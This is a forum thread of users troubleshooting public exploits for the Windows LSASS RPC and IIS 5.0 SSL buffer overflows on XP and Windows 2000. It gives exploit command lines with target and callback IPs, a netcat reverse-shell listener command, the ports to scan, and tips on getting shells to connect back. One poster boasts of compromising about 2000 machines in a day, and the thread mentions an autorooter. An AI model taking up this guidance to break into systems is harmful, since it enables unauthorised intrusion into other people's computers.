..I seen soo many posts about them two I can't read all of it.

So I just want to ask You people this.

[ Lsasrv.dll RPC ] & [ IIS 5.0 SSL ]

Do they both run on WinXP (SP1 in my case) or not?

Cuz I get some errors...

Checked it few times...

ONe says:

Bind Error: 10048

Another:

shellcode: 316
offset: 53

But none of them give shell...

So if any people out there WOULD be NICE to say few things about it.

Thank You

winxp can be attack success by sbaa's exploit [Lsasrv.dll RPC].

Thx m8

But I mean which exploit I can RUN successfuly

Cuz I read some people have trouble with one of them on XP

does this exploit still work or is it too old? read somewhere it was released in october 2003

I gave it a try on win2k and xp locally and it never gave me a shell
think this exploit is dead

uhh...nope...not dead...if 2000 pcs in less then 24 hours is dead..ten.uh.h...:\

about the bind error. dude dont use netcat, the exploit itself listens for the connection. When you have netcat listening the exploit can't use the port because netcat is obviously using it. and yes they all work, the ssl and the lsasrv. THey even work on local area networks (very fun in big lans) Also the lsasrv works locally , great way to give yourself a shell. = ).

Well, I've tried lssass exploit with and without nc, it give me the same results : no shell.

What's wrong ?

it gave me boxes like hell
and exploited I think your math are really really bad

2000 boxes in 24 hours = 1 box every 43 seconds
you're funny man .... euhm not

edit: ow yes, just see it, it was in even less than 24 hours, man , you're a genius !

from what i am using, they r both running on my XP SP1 , Lsasrv needs sbaanetapi.dll in its root,

have been sucessful with 2k not tried XP yet

Windows Lsasrv.dll RPC bufferoverflow Remote Exploit RPC3
IIS 5.0 SSL Buffer OverFlow V.01

I even don`t get shells also using win xp sp1 some ppl got a hugeh amount of shells and other ones not even one!

I think there is a trick, a think we have forgotted, but I don't know what...

For lsass BOF Exploit, I use NetCat in listening mode, and the exploit like rlsasrv.Exe 1 192.160.0.1 666 192.160.2 ( with IP adresse on the net, not on a LAN ) , and... nothing.

I've tried many thing, but nothing works...How do I can exploit this vulnerability ?

test the autorooter and check your lan first without firewall

I haven't made in on a LAN, I've tested it with a friend, on the net... I haven't any firewall, no router, same situation for my friend... his system is vulnerable, I know this, but I've got no shell at all...

In example, I've done :

rlsasrv 1 83.152.142.48 125 83.152.203.18

Where the first IP is the remote, the second is mine...

In a other shell, I've launched netcat like this :

nc -L -t -p 125

I run first netcat, next the exploit, and no results...

Where is the matter ? O_o

DO NOT use netcat with the SSL exploit (0.2), the exploit already has a built in listener. Try it without netcat and it will most likely work, it hasn't failed me yet = ). Best place to test it is in a lan. As far as Lsasrv.dll it works fine with netcat.

GOod luck.

You must set your port when you exploit the server!!

The exploit don´t know youre listening port when you dont give him! shit english i know! I´m sorry!

you must set your shell-port (the port from netcat) and the server will send you the shell on youre netcat!!

Meine Fresse ist das ein Englisch! Sorry

^^ abba ich habs eilig

greets fly out to TNP

But the port is included in the command line, no ?

It follow the shema :

targetip port myip

Here, it's the 125 port...

If its not that... what look the command line ? Can you give me an example ?

A lot of thanks for helper... :]

which ports lsasrv works on ? (which ports should i scan ? )
i know of port 139 but there are others , which ?

XP and 2k are vuln to LSASS. lsass works over pipes, port 445

2k is vuln to ssl. XP theoretical too, but there is no standard application with uses SSL. Under 2k there is the IIS wich uses SSL